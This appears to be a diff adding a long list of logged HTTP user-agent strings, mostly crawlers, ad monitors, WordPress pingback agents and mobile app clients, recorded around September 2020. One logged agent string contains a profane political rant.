    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600283306-0
    +WordPress/5.5.1; https://revistawp.com
    +AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600283304-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600285646-0
    +WhatsApp/2.20.100 i
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600302399-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600319425-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600319359-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600319424-10
    +WhatsApp/2.20.200.10 A
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.118 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600303323-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600303669-0
    +Mozilla/5.0 (Windows NT 6.3; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600334828-0
    +123456111 SEB/3.0.1 (x64)
    +msnbot/1.1 ( http://search.msn.com/msnbot.htm)
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 7.1.1; SM-J727T1 ) U2/1.0.0 Mobile
    +AppEngine-Google; (+http://code.google.com/appengine; appid: e~bizinfotimu)
    +WordPress/5.5.1; http://repository.zeile1.local
    +Google Web Preview
    +WordPress/5.5.1; https://detroitnews.weddingbouquets.club
    +WordPress/5.5.1; https://www.floraip.com; verifying pingback from 181.15.156.170
    +WordPress/5.0.10; http://www.edmpol.com; verifying pingback from 187.92.44.178
    +WordPress/3.1.4; http://www.asakita.jp/rika
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600388209-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600437445-10
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) adbeat.com/policy Gecko/20100101 Firefox/77.0
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600389899-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600393023-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600393020-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1600402474-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600404715-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600414010-0
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.86 YaBrowser/20.8.0.894 Yowser/2.5 Safari/537.36
    +okhttp/3.14.9
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600427447-0
    +WhatsApp/2.2037.6 N
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600442734-0
    +WhatsApp/2.20.200.11 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600402317-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.demand/1600403450-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.demand/1600403726-0
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/85.0.4183.113 Mobile Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600402317-60
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600387749-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600402316-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600402318-10
    +AppEngine-Google; (+http://code.google.com/appengine; appid: g~shopinfotimur)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~bugsinfonikho)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~lakeinfopetr)
    +Mozilla/5.0 (JavaOs x86_64; rv:80.0) Gecko/20100101 Firefox/88.0
    +yacybot (/global; amd64 Linux 5.4.64-0-lts; java 9.0.4; Japan/en) http://yacy.net/bot.html
    +Mozilla/5.0 (Windows NT 6.3; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
    +WordPress/5.5.1; https://softwareproof.com
    +WordPress.com; http://softwareproof.com
    +WordPress.com; https://softwareproof.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600474654-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600539279-10
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/200919.140933
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600476405-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600503713-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600516356-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600518719-0
    +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1600523054-0
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 PTST/200918.220911
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/200918.220911
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 PTST/200919.140933
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~appsinfotimur)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~baseinfotimur)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: o~bizinfovodo)
    +IE=11; IE=10; IE=9; IE=8; IE=7; STOP-JAVA-ALLROUND-THE-WORLD-RIGHT-NOW!-FUCK-OFF-JAVASCRIPTER!FUCK-YOUR-MOTHER!-GERMANY-HAVE-A-BIGBULLSHIT-JUSTICE-NOMONYE-NOJUSTICE-FUCKOFF-DEMOCRACY!!1600528453860
    +WordPress/5.5.1; https://cyberiqs.com/news
    +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1600616137-0
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
    +WordPress/5.5.1; https://www.inspirationalbodies.com; verifying pingback from 211.20.117.251
    +WordPress/4.5.22; http://selety.ru; verifying pingback from 195.161.41.70
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600562500-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600586259-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600601132-0
    +WhatsApp/2.20.200.12 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600620535-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600624022-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600624024-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600624025-0
    +python-asks/2.4.8
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/85.0.4183.113 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.115 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe)
    +WordPress/5.5.1; https://jefar.net
    +WordPress/5.5; http://www.daoldapzha.wang
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1600596778-10
    +AppEngine-Google; (+http://code.google.com/appengine; appid: e~bizinfokoko)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: e~houseinfokrisf)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)
    +snapchat/11.1.1.66 (MI 6; Android 9#V11.0.6.0.PCAMIXM#28)
    +Snapchat/11.1.1.66 (Pixel 3 XL; Android 11#6720564#30; gzip)
    +Windows-RSS-Platform/2.0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600647116-0
    +WordPress/5.5.1; https://apisero.com
    +WhatsApp/2.20.101 i
    +WordPress/3.7.5; http://nicnofonde.unblog.fr
    +WordPress/4.9.13; https://christiannews.net; verifying pingback from 18.184.107.48
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.3.0.1130 (SpeedMode; Proxy; Android 5.0; AS-5433_Secret ) U2/1.0.0 Mobile
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600716569-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600716551-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600727451-10
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.123 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600648303-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600678304-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600703328-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600727036-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.demand/1600698657-0
    +WordPress/5.5; http://www.ganrshuipt.wang
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1600655366-10
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~bizinfogeor)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: o~shopinfokris)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: g~stockinfovodom)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600671903-0
    +Java/1.7.0_181
    +Mozilla/5.0 (compatible; U; AnyEvent-HTTP/2.21; +http://software.schmorp.de/pkg/AnyEvent)
    +Pompos/1.1 http://pompos.iliad.fr
    +360Spider
    +Python/3.6 aiohttp/2.1.0
    +WordPress/5.4.2; http://www.citizensforcriminaljustice.net
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600734092-0
    +WhatsApp/2.20.201.2 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600796489-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600800689-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600803385-0
    +Mozilla/5.0 (compatible; AhrefsBot/7.0; News; +http://ahrefs.com/robot/)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600733990-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.noproxy/1600783195-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600793442-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600796835-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600800952-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600735413-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600740494-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600740515-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600745267-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600748444-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600774504-0
    +WhatsApp/2.20.201.1 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600797143-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600801306-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600803932-0
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.125 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1600771155-10
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 PTST/200921.220951
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 PTST/200921.220951
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.1.1138 (SpeedMode; Proxy; Android 4.4.2; SM-C111 ) U2/1.0.0 Mobile
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/200921.220951
    +Mozilla/5.0 (compatible; AhrefsBot/7.0; SA; +http://ahrefs.com/robot/)
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/85.0.4183.122 Mobile Safari/537.36
    +WordPress/5.5.1; https://itakstr.ru
    +MaxPointCrawler/Nutch-1.17 (maxpoint.crawler at maxpointinteractive dot com)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: o~shopinfoodin)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~stockinfokoko)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: g~bugsinfotimur)
    +Mozilla/5.0 (X11; Linux x86_64; rv:10.0; special_archiver; Archive-It; +http://archive-it.org/files/site-owners-special.html) Gecko/20150101 Firefox/47.0 (Chrome)
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) Chromium/31.0.1650.63 Site-Shot/2.1 (http://www.site-shot.com/) Safari/537.21
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 OPR/69.0.3686.95
    +Snapchat/11.1.0.65 (iPhone12,3; iOS 14.0; gzip)
    +Apache-HttpClient/4.5.10 (Java/1.8.0_265)
    +WhatsApp/2.20.201.3 A
    +Snapchat/11.1.6.0 (iPhone10,1; iOS 14.0; gzip)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600820882-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600822414-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600824822-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600854842-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600858506-10
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.131 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600820931-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600825420-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600829370-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600830505-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600834441-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600834815-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600852082-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600854929-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600859113-0
    +WhatsApp/2.20.199.12 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600861791-0
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/85.0.4183.122 Safari/537.36
    +crawler/js-crawler
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600896597-0
    +WordPress/5.5.1; http://staging.mergerscorp.com
    +Snapchat/11.1.0.65 (iPhone11,6; iOS 13.7; gzip)
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1600896740-60
    +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1600896739-0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 4.4.4; DLI-TL20 ) U2/1.0.0 Mobile
    +WordPress/4.9.15; http://www.shvmuf.co
    +AppEngine-Google; (+http://code.google.com/appengine; appid: e~baseinfonatav)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: e~nazaokanefli)
    +Mozilla/5.0 (AmigaOs; 4.0; en-US; rv:1.8.1.21pre)  AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.666.4147.105 Safari/537.36
    +WordPress/5.4.2; https://spookening.se
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/87.0.4265.0 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600895869-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600895870-0
    +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0 (BrowserSpyBot/1.0) (http://browserspy.dk/)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600907674-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600911483-0
